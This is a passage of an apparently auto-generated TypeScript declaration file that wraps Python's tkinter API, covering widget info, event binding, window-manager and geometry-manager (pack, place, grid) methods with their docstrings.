grayscale, pseudocolor,\n\t\t * staticcolor, staticgray, or truecolor for the\n\t\t * colormodel of this widget.\n\t\t */\n\t\twinfo_visual(): Promise<any>\n\t\twinfo_visual$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the X identifier for the visual for this widget.\n\t\t */\n\t\twinfo_visualid(): Promise<any>\n\t\twinfo_visualid$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return a list of all visuals available for the screen\n\t\t * of this widget.\n\t\t * \n\t\t * Each item in the list consists of a visual name (see winfo_visual), a\n\t\t * depth and if includeids is true is given also the X identifier.\n\t\t */\n\t\twinfo_visualsavailable(includeids?: boolean): Promise<any>\n\t\twinfo_visualsavailable$({ includeids }: { includeids?}): Promise<any>\n\n\t\t/**\n\t\t * Return the height of the virtual root window associated with this\n\t\t * widget in pixels. If there is no virtual root window return the\n\t\t * height of the screen.\n\t\t */\n\t\twinfo_vrootheight(): Promise<any>\n\t\twinfo_vrootheight$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the width of the virtual root window associated with this\n\t\t * widget in pixel. If there is no virtual root window return the\n\t\t * width of the screen.\n\t\t */\n\t\twinfo_vrootwidth(): Promise<any>\n\t\twinfo_vrootwidth$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the x offset of the virtual root relative to the root\n\t\t * window of the screen of this widget.\n\t\t */\n\t\twinfo_vrootx(): Promise<any>\n\t\twinfo_vrootx$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the y offset of the virtual root relative to the root\n\t\t * window of the screen of this widget.\n\t\t */\n\t\twinfo_vrooty(): Promise<any>\n\t\twinfo_vrooty$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the width of this widget.\n\t\t */\n\t\twinfo_width(): Promise<any>\n\t\twinfo_width$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the x coordinate of the upper left corner of this widget\n\t\t * in the parent.\n\t\t */\n\t\twinfo_x(): Promise<any>\n\t\twinfo_x$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the y coordinate of the upper left corner of this widget\n\t\t * in the parent.\n\t\t */\n\t\twinfo_y(): Promise<any>\n\t\twinfo_y$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Enter event loop until all pending events have been processed by Tcl.\n\t\t */\n\t\tupdate(): Promise<any>\n\t\tupdate$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Enter event loop until all idle callbacks have been called. This\n\t\t * will update the display of windows but not process events caused by\n\t\t * the user.\n\t\t */\n\t\tupdate_idletasks(): Promise<any>\n\t\tupdate_idletasks$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set or get the list of bindtags for this widget.\n\t\t * \n\t\t * With no argument return the list of all bindtags associated with\n\t\t * this widget. With a list of strings as argument the bindtags are\n\t\t * set to this list. The bindtags determine in which order events are\n\t\t * processed (see bind).\n\t\t */\n\t\tbindtags(tagList?): Promise<any>\n\t\tbindtags$({ tagList }: { tagList?}): Promise<any>\n\n\t\t/**\n\t\t * Bind to this widget at event SEQUENCE a call to function FUNC.\n\t\t * \n\t\t * SEQUENCE is a string of concatenated event\n\t\t * patterns. An event pattern is of the form\n\t\t * <MODIFIER-MODIFIER-TYPE-DETAIL> where MODIFIER is one\n\t\t * of Control, Mod2, M2, Shift, Mod3, M3, Lock, Mod4, M4,\n\t\t * Button1, B1, Mod5, M5 Button2, B2, Meta, M, Button3,\n\t\t * B3, Alt, Button4, B4, Double, Button5, B5 Triple,\n\t\t * Mod1, M1. TYPE is one of Activate, Enter, Map,\n\t\t * ButtonPress, Button, Expose, Motion, ButtonRelease\n\t\t * FocusIn, MouseWheel, Circulate, FocusOut, Property,\n\t\t * Colormap, Gravity Reparent, Configure, KeyPress, Key,\n\t\t * Unmap, Deactivate, KeyRelease Visibility, Destroy,\n\t\t * Leave and DETAIL is the button number for ButtonPress,\n\t\t * ButtonRelease and DETAIL is the Keysym for KeyPress and\n\t\t * KeyRelease. Examples are\n\t\t * <Control-Button-1> for pressing Control and mouse button 1 or\n\t\t * <Alt-A> for pressing A and the Alt key (KeyPress can be omitted).\n\t\t * An event pattern can also be a virtual event of the form\n\t\t * <<AString>> where AString can be arbitrary. This\n\t\t * event can be generated by event_generate.\n\t\t * If events are concatenated they must appear shortly\n\t\t * after each other.\n\t\t * \n\t\t * FUNC will be called if the event sequence occurs with an\n\t\t * instance of Event as argument. If the return value of FUNC is\n\t\t * \"break\" no further bound function is invoked.\n\t\t * \n\t\t * An additional boolean parameter ADD specifies whether FUNC will\n\t\t * be called additionally to the other bound function or whether\n\t\t * it will replace the previous function.\n\t\t * \n\t\t * Bind will return an identifier to allow deletion of the bound function with\n\t\t * unbind without memory leak.\n\t\t * \n\t\t * If FUNC or SEQUENCE is omitted the bound function or list\n\t\t * of bound events are returned.\n\t\t */\n\t\tbind(sequence?, func?, add?): Promise<any>\n\t\tbind$({ sequence, func, add }: { sequence?, func?, add?}): Promise<any>\n\n\t\t/**\n\t\t * Unbind for this widget for event SEQUENCE the\n\t\t * function identified with FUNCID.\n\t\t */\n\t\tunbind(sequence, funcid?): Promise<any>\n\t\tunbind$({ sequence, funcid }: { sequence, funcid?}): Promise<any>\n\n\t\t/**\n\t\t * Bind to all widgets at an event SEQUENCE a call to function FUNC.\n\t\t * An additional boolean parameter ADD specifies whether FUNC will\n\t\t * be called additionally to the other bound function or whether\n\t\t * it will replace the previous function. See bind for the return value.\n\t\t */\n\t\tbind_all(sequence?, func?, add?): Promise<any>\n\t\tbind_all$({ sequence, func, add }: { sequence?, func?, add?}): Promise<any>\n\n\t\t/**\n\t\t * Unbind for all widgets for event SEQUENCE all functions.\n\t\t */\n\t\tunbind_all(sequence): Promise<any>\n\t\tunbind_all$({ sequence }): Promise<any>\n\n\t\t/**\n\t\t * Bind to widgets with bindtag CLASSNAME at event\n\t\t * SEQUENCE a call of function FUNC. An additional\n\t\t * boolean parameter ADD specifies whether FUNC will be\n\t\t * called additionally to the other bound function or\n\t\t * whether it will replace the previous function. See bind for\n\t\t * the return value.\n\t\t */\n\t\tbind_class(className, sequence?, func?, add?): Promise<any>\n\t\tbind_class$({ className, sequence, func, add }: { className, sequence?, func?, add?}): Promise<any>\n\n\t\t/**\n\t\t * Unbind for all widgets with bindtag CLASSNAME for event SEQUENCE\n\t\t * all functions.\n\t\t */\n\t\tunbind_class(className, sequence): Promise<any>\n\t\tunbind_class$({ className, sequence }): Promise<any>\n\n\t\t/**\n\t\t * Call the mainloop of Tk.\n\t\t */\n\t\tmainloop(n?): Promise<any>\n\t\tmainloop$({ n }: { n?}): Promise<any>\n\n\t\t/**\n\t\t * Quit the Tcl interpreter. All widgets will be destroyed.\n\t\t */\n\t\tquit(): Promise<any>\n\t\tquit$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return the Tkinter instance of a widget identified by\n\t\t * its Tcl name NAME.\n\t\t */\n\t\tnametowidget(name): Promise<any>\n\t\tnametowidget$({ name }): Promise<any>\n\n\t\t/**\n\t\t * Configure resources of a widget.\n\t\t * \n\t\t * The values for resources are specified as keyword\n\t\t * arguments. To get an overview about\n\t\t * the allowed keyword arguments call the method keys.\n\t\t * \n\t\t */\n\t\tconfigure(cnf?): Promise<any>\n\t\tconfigure$({ cnf }: { cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Return the resource value for a KEY given as string.\n\t\t */\n\t\tcget(key): Promise<any>\n\t\tcget$({ key }): Promise<any>\n\n\t\t/**\n\t\t * Return a list of all resource names of this widget.\n\t\t */\n\t\tkeys(): Promise<any>\n\t\tkeys$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set or get the status for propagation of geometry information.\n\t\t * \n\t\t * A boolean argument specifies whether the geometry information\n\t\t * of the slaves will determine the size of this widget. If no argument\n\t\t * is given the current setting will be returned.\n\t\t * \n\t\t */\n\t\tpack_propagate(flag?): Promise<any>\n\t\tpack_propagate$({ flag }: { flag?}): Promise<any>\n\n\t\t/**\n\t\t * Return a list of all slaves of this widget\n\t\t * in its packing order.\n\t\t */\n\t\tpack_slaves(): Promise<any>\n\t\tpack_slaves$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return a list of all slaves of this widget\n\t\t * in its packing order.\n\t\t */\n\t\tplace_slaves(): Promise<any>\n\t\tplace_slaves$($: {}): Promise<any>\n\n\t\t/**\n\t\t * The anchor value controls how to place the grid within the\n\t\t * master when no row/column has any weight.\n\t\t * \n\t\t * The default anchor is nw.\n\t\t */\n\t\tgrid_anchor(anchor?): Promise<any>\n\t\tgrid_anchor$({ anchor }: { anchor?}): Promise<any>\n\n\t\t/**\n\t\t * Return a tuple of integer coordinates for the bounding\n\t\t * box of this widget controlled by the geometry manager grid.\n\t\t * \n\t\t * If COLUMN, ROW is given the bounding box applies from\n\t\t * the cell with row and column 0 to the specified\n\t\t * cell. If COL2 and ROW2 are given the bounding box\n\t\t * starts at that cell.\n\t\t * \n\t\t * The returned integers specify the offset of the upper left\n\t\t * corner in the master widget and the width and height.\n\t\t * \n\t\t */\n\t\tgrid_bbox(column?, row?, col2?, row2?): Promise<any>\n\t\tgrid_bbox$({ column, row, col2, row2 }: { column?, row?, col2?, row2?}): Promise<any>\n\n\t\t/**\n\t\t * Configure column INDEX of a grid.\n\t\t * \n\t\t * Valid resources are minsize (minimum size of the column),\n\t\t * weight (how much does additional space propagate to this column)\n\t\t * and pad (how much space to let additionally).\n\t\t */\n\t\tgrid_columnconfigure(index, cnf?): Promise<any>\n\t\tgrid_columnconfigure$({ index, cnf }: { index, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Return a tuple of column and row which identify the cell\n\t\t * at which the pixel at position X and Y inside the master\n\t\t * widget is located.\n\t\t */\n\t\tgrid_location(x, y): Promise<any>\n\t\tgrid_location$({ x, y }): Promise<any>\n\n\t\t/**\n\t\t * Set or get the status for propagation of geometry information.\n\t\t * \n\t\t * A boolean argument specifies whether the geometry information\n\t\t * of the slaves will determine the size of this widget. If no argument\n\t\t * is given, the current setting will be returned.\n\t\t * \n\t\t */\n\t\tgrid_propagate(flag?): Promise<any>\n\t\tgrid_propagate$({ flag }: { flag?}): Promise<any>\n\n\t\t/**\n\t\t * Configure row INDEX of a grid.\n\t\t * \n\t\t * Valid resources are minsize (minimum size of the row),\n\t\t * weight (how much does additional space propagate to this row)\n\t\t * and pad (how much space to let additionally).\n\t\t */\n\t\tgrid_rowconfigure(index, cnf?): Promise<any>\n\t\tgrid_rowconfigure$({ index, cnf }: { index, cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Return a tuple of the number of column and rows in the grid.\n\t\t */\n\t\tgrid_size(): Promise<any>\n\t\tgrid_size$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return a list of all slaves of this widget\n\t\t * in its packing order.\n\t\t */\n\t\tgrid_slaves(row?, column?): Promise<any>\n\t\tgrid_slaves$({ row, column }: { row?, column?}): Promise<any>\n\n\t\t/**\n\t\t * Bind a virtual event VIRTUAL (of the form <<Name>>)\n\t\t * to an event SEQUENCE such that the virtual event is triggered\n\t\t * whenever SEQUENCE occurs.\n\t\t */\n\t\tevent_add(virtual): Promise<any>\n\t\tevent_add$({ virtual }): Promise<any>\n\n\t\t/**\n\t\t * Unbind a virtual event VIRTUAL from SEQUENCE.\n\t\t */\n\t\tevent_delete(virtual): Promise<any>\n\t\tevent_delete$({ virtual }): Promise<any>\n\n\t\t/**\n\t\t * Generate an event SEQUENCE. Additional\n\t\t * keyword arguments specify parameter of the event\n\t\t * (e.g. x, y, rootx, rooty).\n\t\t */\n\t\tevent_generate(sequence): Promise<any>\n\t\tevent_generate$({ sequence }): Promise<any>\n\n\t\t/**\n\t\t * Return a list of all virtual events or the information\n\t\t * about the SEQUENCE bound to the virtual event VIRTUAL.\n\t\t */\n\t\tevent_info(virtual?): Promise<any>\n\t\tevent_info$({ virtual }: { virtual?}): Promise<any>\n\n\t\t/**\n\t\t * Return a list of all existing image names.\n\t\t */\n\t\timage_names(): Promise<any>\n\t\timage_names$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return a list of all available image types (e.g. photo bitmap).\n\t\t */\n\t\timage_types(): Promise<any>\n\t\timage_types$($: {}): Promise<any>\n\t\twaitvar\n\t\tfocus\n\t\tlift\n\t\tregister\n\t\tconfig\n\t\tpropagate\n\t\tslaves\n\t\tanchor\n\t\tbbox\n\t\tcolumnconfigure\n\t\trowconfigure\n\t\tsize\n\t}\n\n\t/**\n\t * Internal class. Stores function to call when some user\n\t * defined Tcl function is called e.g. after an event occurred.\n\t */\n\n\t/**\n\t * Store FUNC, SUBST and WIDGET as members.\n\t */\n\tfunction CallWrapper(func, subst, widget): Promise<ICallWrapper>\n\tfunction CallWrapper$({ func, subst, widget }): Promise<ICallWrapper>\n\tinterface ICallWrapper {\n\t}\n\n\t/**\n\t * Mix-in class for querying and changing the horizontal position\n\t * of a widget's window.\n\t */\n\tinterface IXView {\n\n\t\t/**\n\t\t * Query and change the horizontal position of the view.\n\t\t */\n\t\txview(): Promise<any>\n\t\txview$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Adjusts the view in the window so that FRACTION of the\n\t\t * total width of the canvas is off-screen to the left.\n\t\t */\n\t\txview_moveto(fraction): Promise<any>\n\t\txview_moveto$({ fraction }): Promise<any>\n\n\t\t/**\n\t\t * Shift the x-view according to NUMBER which is measured in \"units\"\n\t\t * or \"pages\" (WHAT).\n\t\t */\n\t\txview_scroll(number, what): Promise<any>\n\t\txview_scroll$({ number, what }): Promise<any>\n\t}\n\n\t/**\n\t * Mix-in class for querying and changing the vertical position\n\t * of a widget's window.\n\t */\n\tinterface IYView {\n\n\t\t/**\n\t\t * Query and change the vertical position of the view.\n\t\t */\n\t\tyview(): Promise<any>\n\t\tyview$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Adjusts the view in the window so that FRACTION of the\n\t\t * total height of the canvas is off-screen to the top.\n\t\t */\n\t\tyview_moveto(fraction): Promise<any>\n\t\tyview_moveto$({ fraction }): Promise<any>\n\n\t\t/**\n\t\t * Shift the y-view according to NUMBER which is measured in\n\t\t * \"units\" or \"pages\" (WHAT).\n\t\t */\n\t\tyview_scroll(number, what): Promise<any>\n\t\tyview_scroll$({ number, what }): Promise<any>\n\t}\n\n\t/**\n\t * Provides functions for the communication with the window manager.\n\t */\n\tinterface IWm {\n\n\t\t/**\n\t\t * Instruct the window manager to set the aspect ratio (width/height)\n\t\t * of this widget to be between MINNUMER/MINDENOM and MAXNUMER/MAXDENOM. Return a tuple\n\t\t * of the actual values if no argument is given.\n\t\t */\n\t\twm_aspect(minNumer?, minDenom?, maxNumer?, maxDenom?): Promise<any>\n\t\twm_aspect$({ minNumer, minDenom, maxNumer, maxDenom }: { minNumer?, minDenom?, maxNumer?, maxDenom?}): Promise<any>\n\n\t\t/**\n\t\t * This subcommand returns or sets platform specific attributes\n\t\t * \n\t\t * The first form returns a list of the platform specific flags and\n\t\t * their values. The second form returns the value for the specific\n\t\t * option. The third form sets one or more of the values. The values\n\t\t * are as follows:\n\t\t * \n\t\t * On Windows, -disabled gets or sets whether the window is in a\n\t\t * disabled state. -toolwindow gets or sets the style of the window\n\t\t * to toolwindow (as defined in the MSDN). -topmost gets or sets\n\t\t * whether this is a topmost window (displays above all other\n\t\t * windows).\n\t\t * \n\t\t * On Macintosh, XXXXX\n\t\t * \n\t\t * On Unix, there are currently no special attribute values.\n\t\t * \n\t\t */\n\t\twm_attributes(): Promise<any>\n\t\twm_attributes$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Store NAME in WM_CLIENT_MACHINE property of this widget. Return\n\t\t * current value.\n\t\t */\n\t\twm_client(name?): Promise<any>\n\t\twm_client$({ name }: { name?}): Promise<any>\n\n\t\t/**\n\t\t * Store list of window names (WLIST) into WM_COLORMAPWINDOWS property\n\t\t * of this widget. This list contains windows whose colormaps differ from their\n\t\t * parents. Return current list of widgets if WLIST is empty.\n\t\t */\n\t\twm_colormapwindows(): Promise<any>\n\t\twm_colormapwindows$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Store VALUE in WM_COMMAND property. It is the command\n\t\t * which shall be used to invoke the application. Return current\n\t\t * command if VALUE is None.\n\t\t */\n\t\twm_command(value?): Promise<any>\n\t\twm_command$({ value }: { value?}): Promise<any>\n\n\t\t/**\n\t\t * Deiconify this widget. If it was never mapped it will not be mapped.\n\t\t * On Windows it will raise this widget and give it the focus.\n\t\t */\n\t\twm_deiconify(): Promise<any>\n\t\twm_deiconify$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set focus model to MODEL. \"active\" means that this widget will claim\n\t\t * the focus itself, \"passive\" means that the window manager shall give\n\t\t * the focus. Return current focus model if MODEL is None.\n\t\t */\n\t\twm_focusmodel(model?): Promise<any>\n\t\twm_focusmodel$({ model }: { model?}): Promise<any>\n\n\t\t/**\n\t\t * The window will be unmapped from the screen and will no longer\n\t\t * be managed by wm. toplevel windows will be treated like frame\n\t\t * windows once they are no longer managed by wm, however, the menu\n\t\t * option configuration will be remembered and the menus will return\n\t\t * once the widget is managed again.\n\t\t */\n\t\twm_forget(window): Promise<any>\n\t\twm_forget$({ window }): Promise<any>\n\n\t\t/**\n\t\t * Return identifier for decorative frame of this widget if present.\n\t\t */\n\t\twm_frame(): Promise<any>\n\t\twm_frame$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set geometry to NEWGEOMETRY of the form =widthxheight+x+y. Return\n\t\t * current value if None is given.\n\t\t */\n\t\twm_geometry(newGeometry?): Promise<any>\n\t\twm_geometry$({ newGeometry }: { newGeometry?}): Promise<any>\n\n\t\t/**\n\t\t * Instruct the window manager that this widget shall only be\n\t\t * resized on grid boundaries. WIDTHINC and HEIGHTINC are the width and\n\t\t * height of a grid unit in pixels. BASEWIDTH and BASEHEIGHT are the\n\t\t * number of grid units requested in Tk_GeometryRequest.\n\t\t */\n\t\twm_grid(baseWidth?, baseHeight?, widthInc?, heightInc?): Promise<any>\n\t\twm_grid$({ baseWidth, baseHeight, widthInc, heightInc }: { baseWidth?, baseHeight?, widthInc?, heightInc?}): Promise<any>\n\n\t\t/**\n\t\t * Set the group leader widgets for related widgets to PATHNAME. Return\n\t\t * the group leader of this widget if None is given.\n\t\t */\n\t\twm_group(pathName?): Promise<any>\n\t\twm_group$({ pathName }: { pathName?}): Promise<any>\n\n\t\t/**\n\t\t * Set bitmap for the iconified widget to BITMAP. Return\n\t\t * the bitmap if None is given.\n\t\t * \n\t\t * Under Windows, the DEFAULT parameter can be used to set the icon\n\t\t * for the widget and any descendents that don't have an icon set\n\t\t * explicitly. DEFAULT can be the relative path to a .ico file\n\t\t * (example: root.iconbitmap(default='myicon.ico') ). See Tk\n\t\t * documentation for more information.\n\t\t */\n\t\twm_iconbitmap(bitmap?, def?): Promise<any>\n\t\twm_iconbitmap$({ bitmap, def }: { bitmap?, def?}): Promise<any>\n\n\t\t/**\n\t\t * Display widget as icon.\n\t\t */\n\t\twm_iconify(): Promise<any>\n\t\twm_iconify$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Set mask for the icon bitmap of this widget. Return the\n\t\t * mask if None is given.\n\t\t */\n\t\twm_iconmask(bitmap?): Promise<any>\n\t\twm_iconmask$({ bitmap }: { bitmap?}): Promise<any>\n\n\t\t/**\n\t\t * Set the name of the icon for this widget. Return the name if\n\t\t * None is given.\n\t\t */\n\t\twm_iconname(newName?): Promise<any>\n\t\twm_iconname$({ newName }: { newName?}): Promise<any>\n\n\t\t/**\n\t\t * Sets the titlebar icon for this window based on the named photo\n\t\t * images passed through args. If default is True, this is applied to\n\t\t * all future created toplevels as well.\n\t\t * \n\t\t * The data in the images is taken as a snapshot at the time of\n\t\t * invocation. If the images are later changed, this is not reflected\n\t\t * to the titlebar icons. Multiple images are accepted to allow\n\t\t * different images sizes to be provided. The window manager may scale\n\t\t * provided icons to an appropriate size.\n\t\t * \n\t\t * On Windows, the images are packed into a Windows icon structure.\n\t\t * This will override an icon specified to wm_iconbitmap, and vice\n\t\t * versa.\n\t\t * \n\t\t * On X, the images are arranged into the _NET_WM_ICON X property,\n\t\t * which most modern window managers support. An icon specified by\n\t\t * wm_iconbitmap may exist simultaneously.\n\t\t * \n\t\t * On Macintosh, this currently does nothing.\n\t\t */\n\t\twm_iconphoto(def?: boolean): Promise<any>\n\t\twm_iconphoto$({ def }: { def?}): Promise<any>\n\n\t\t/**\n\t\t * Set the position of the icon of this widget to X and Y. Return\n\t\t * a tuple of the current values of X and X if None is given.\n\t\t */\n\t\twm_iconposition(x?, y?): Promise<any>\n\t\twm_iconposition$({ x, y }: { x?, y?}): Promise<any>\n\n\t\t/**\n\t\t * Set widget PATHNAME to be displayed instead of icon. Return the current\n\t\t * value if None is given.\n\t\t */\n\t\twm_iconwindow(pathName?): Promise<any>\n\t\twm_iconwindow$({ pathName }: { pathName?}): Promise<any>\n\n\t\t/**\n\t\t * The widget specified will become a stand alone top-level window.\n\t\t * The window will be decorated with the window managers title bar,\n\t\t * etc.\n\t\t */\n\t\twm_manage(widget): Promise<any>\n\t\twm_manage$({ widget }): Promise<any>\n\n\t\t/**\n\t\t * Set max WIDTH and HEIGHT for this widget. If the window is gridded\n\t\t * the values are given in grid units. Return the current values if None\n\t\t * is given.\n\t\t */\n\t\twm_maxsize(width?, height?): Promise<any>\n\t\twm_maxsize$({ width, height }: { width?, height?}): Promise<any>\n\n\t\t/**\n\t\t * Set min WIDTH and HEIGHT for this widget. If the window is gridded\n\t\t * the values are given in grid units. Return the current values if None\n\t\t * is given.\n\t\t */\n\t\twm_minsize(width?, height?): Promise<any>\n\t\twm_minsize$({ width, height }: { width?, height?}): Promise<any>\n\n\t\t/**\n\t\t * Instruct the window manager to ignore this widget\n\t\t * if BOOLEAN is given with 1. Return the current value if None\n\t\t * is given.\n\t\t */\n\t\twm_overrideredirect(boolean?): Promise<any>\n\t\twm_overrideredirect$({ boolean }: { boolean?}): Promise<any>\n\n\t\t/**\n\t\t * Instruct the window manager that the position of this widget shall\n\t\t * be defined by the user if WHO is \"user\", and by its own policy if WHO is\n\t\t * \"program\".\n\t\t */\n\t\twm_positionfrom(who?): Promise<any>\n\t\twm_positionfrom$({ who }: { who?}): Promise<any>\n\n\t\t/**\n\t\t * Bind function FUNC to command NAME for this widget.\n\t\t * Return the function bound to NAME if None is given. NAME could be\n\t\t * e.g. \"WM_SAVE_YOURSELF\" or \"WM_DELETE_WINDOW\".\n\t\t */\n\t\twm_protocol(name?, func?): Promise<any>\n\t\twm_protocol$({ name, func }: { name?, func?}): Promise<any>\n\n\t\t/**\n\t\t * Instruct the window manager whether this width can be resized\n\t\t * in WIDTH or HEIGHT. Both values are boolean values.\n\t\t */\n\t\twm_resizable(width?, height?): Promise<any>\n\t\twm_resizable$({ width, height }: { width?, height?}): Promise<any>\n\n\t\t/**\n\t\t * Instruct the window manager that the size of this widget shall\n\t\t * be defined by the user if WHO is \"user\", and by its own policy if WHO is\n\t\t * \"program\".\n\t\t */\n\t\twm_sizefrom(who?): Promise<any>\n\t\twm_sizefrom$({ who }: { who?}): Promise<any>\n\n\t\t/**\n\t\t * Query or set the state of this widget as one of normal, icon,\n\t\t * iconic (see wm_iconwindow), withdrawn, or zoomed (Windows only).\n\t\t */\n\t\twm_state(newstate?): Promise<any>\n\t\twm_state$({ newstate }: { newstate?}): Promise<any>\n\n\t\t/**\n\t\t * Set the title of this widget.\n\t\t */\n\t\twm_title(string?): Promise<any>\n\t\twm_title$({ string }: { string?}): Promise<any>\n\n\t\t/**\n\t\t * Instruct the window manager that this widget is transient\n\t\t * with regard to widget MASTER.\n\t\t */\n\t\twm_transient(master?): Promise<any>\n\t\twm_transient$({ master }: { master?}): Promise<any>\n\n\t\t/**\n\t\t * Withdraw this widget from the screen such that it is unmapped\n\t\t * and forgotten by the window manager. Re-draw it with wm_deiconify.\n\t\t */\n\t\twm_withdraw(): Promise<any>\n\t\twm_withdraw$($: {}): Promise<any>\n\t\taspect\n\t\tattributes\n\t\tclient\n\t\tcolormapwindows\n\t\tcommand\n\t\tdeiconify\n\t\tfocusmodel\n\t\tforget\n\t\tframe\n\t\tgeometry\n\t\tgrid\n\t\tgroup\n\t\ticonbitmap\n\t\ticonify\n\t\ticonmask\n\t\ticonname\n\t\ticonphoto\n\t\ticonposition\n\t\ticonwindow\n\t\tmanage\n\t\tmaxsize\n\t\tminsize\n\t\toverrideredirect\n\t\tpositionfrom\n\t\tprotocol\n\t\tresizable\n\t\tsizefrom\n\t\tstate\n\t\ttitle\n\t\ttransient\n\t\twithdraw\n\t}\n\n\t/**\n\t * Toplevel widget of Tk which represents mostly the main window\n\t * of an application. It has an associated Tcl interpreter.\n\t */\n\n\t/**\n\t * Return a new Toplevel widget on screen SCREENNAME. A new Tcl interpreter will\n\t * be created. BASENAME will be used for the identification of the profile file (see\n\t * readprofile).\n\t * It is constructed from sys.argv[0] without extensions if None is given. CLASSNAME\n\t * is the name of the widget class.\n\t */\n\tfunction Tk(screenName?, baseName?, className?, useTk?: boolean, sync?: boolean, use?): Promise<ITk>\n\tfunction Tk$({ screenName, baseName, className, useTk, sync, use }: { screenName?, baseName?, className?, useTk?, sync?, use?}): Promise<ITk>\n\tinterface ITk extends IMisc, IWm {\n\t\tloadtk(): Promise<any>\n\t\tloadtk$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Destroy this and all descendants widgets. This will\n\t\t * end the application of this Tcl interpreter.\n\t\t */\n\t\tdestroy(): Promise<any>\n\t\tdestroy$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Internal function. It reads BASENAME.tcl and CLASSNAME.tcl into\n\t\t * the Tcl Interpreter and calls exec on the contents of BASENAME.py and\n\t\t * CLASSNAME.py if such a file exists in the home directory.\n\t\t */\n\t\treadprofile(baseName, className): Promise<any>\n\t\treadprofile$({ baseName, className }): Promise<any>\n\n\t\t/**\n\t\t * Report callback exception on sys.stderr.\n\t\t * \n\t\t * Applications may want to override this internal function, and\n\t\t * should when sys.stderr is None.\n\t\t */\n\t\treport_callback_exception(exc, val, tb): Promise<any>\n\t\treport_callback_exception$({ exc, val, tb }): Promise<any>\n\t}\n\n\t/**\n\t * Geometry manager Pack.\n\t * \n\t * Base class to use the methods pack_* in every widget.\n\t */\n\tinterface IPack {\n\n\t\t/**\n\t\t * Pack a widget in the parent widget. Use as options:\n\t\t * after=widget - pack it after you have packed widget\n\t\t * anchor=NSEW (or subset) - position widget according to\n\t\t * given direction\n\t\t * before=widget - pack it before you will pack widget\n\t\t * expand=bool - expand widget if parent size grows\n\t\t * fill=NONE or X or Y or BOTH - fill widget if widget grows\n\t\t * in=master - use master to contain this widget\n\t\t * in_=master - see 'in' option description\n\t\t * ipadx=amount - add internal padding in x direction\n\t\t * ipady=amount - add internal padding in y direction\n\t\t * padx=amount - add padding in x direction\n\t\t * pady=amount - add padding in y direction\n\t\t * side=TOP or BOTTOM or LEFT or RIGHT - where to add this widget.\n\t\t * \n\t\t */\n\t\tpack_configure(cnf?): Promise<any>\n\t\tpack_configure$({ cnf }: { cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Unmap this widget and do not use it for the packing order.\n\t\t */\n\t\tpack_forget(): Promise<any>\n\t\tpack_forget$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return information about the packing options\n\t\t * for this widget.\n\t\t */\n\t\tpack_info(): Promise<any>\n\t\tpack_info$($: {}): Promise<any>\n\t\tpack\n\t\tinfo\n\t}\n\n\t/**\n\t * Geometry manager Place.\n\t * \n\t * Base class to use the methods place_* in every widget.\n\t */\n\tinterface IPlace {\n\n\t\t/**\n\t\t * Place a widget in the parent widget. Use as options:\n\t\t * in=master - master relative to which the widget is placed\n\t\t * in_=master - see 'in' option description\n\t\t * x=amount - locate anchor of this widget at position x of master\n\t\t * y=amount - locate anchor of this widget at position y of master\n\t\t * relx=amount - locate anchor of this widget between 0.0 and 1.0\n\t\t * relative to width of master (1.0 is right edge)\n\t\t * rely=amount - locate anchor of this widget between 0.0 and 1.0\n\t\t * relative to height of master (1.0 is bottom edge)\n\t\t * anchor=NSEW (or subset) - position anchor according to given direction\n\t\t * width=amount - width of this widget in pixel\n\t\t * height=amount - height of this widget in pixel\n\t\t * relwidth=amount - width of this widget between 0.0 and 1.0\n\t\t * relative to width of master (1.0 is the same width\n\t\t * as the master)\n\t\t * relheight=amount - height of this widget between 0.0 and 1.0\n\t\t * relative to height of master (1.0 is the same\n\t\t * height as the master)\n\t\t * bordermode=\"inside\" or \"outside\" - whether to take border width of\n\t\t * master widget into account\n\t\t * \n\t\t */\n\t\tplace_configure(cnf?): Promise<any>\n\t\tplace_configure$({ cnf }: { cnf?}): Promise<any>\n\n\t\t/**\n\t\t * Unmap this widget.\n\t\t */\n\t\tplace_forget(): Promise<any>\n\t\tplace_forget$($: {}): Promise<any>\n\n\t\t/**\n\t\t * Return information about the placing options\n\t\t * for this widget.\n\t\t */\n\t\tplace_info(): Promise<any>\n\t\tplace_info$($: {}): Promise<any>\n\t\tplace\n\t}\n\n\t/**\n\t * Geometry manager Grid.\n\t * \n\t * Base class to use the methods grid_* in every widget.\n\t */\n\tinterface IGrid {\n\n\t\t/**\n\t\t * Position a widget in the parent widget in a grid. Use as options:\n\t\t * column=number - use cell identified with given column (starting with 0)\n\t\t * columnspan=number - this widget will span several columns\n\t\t * in=master - use master to contain this widget\n\t\t * in_=master - see 'in' option description\n\t\t * ipadx=amount - add internal padding in x direction\n\t\t * ipady=amount - add internal padding in y direction\n\t\t * padx=amount - add padding in x direction\n\t\t * pady=amount - add padding in y direction\n\t\t * row=number - use cell identified with given row (starting with 0)\n\t\t * rowspan=number - this widget will span several rows\n\t\t * sticky=NSEW - if cell is larger on which sides will this\n\t\t * widget stick to the cell boundary\n\t\t * \n\t\t 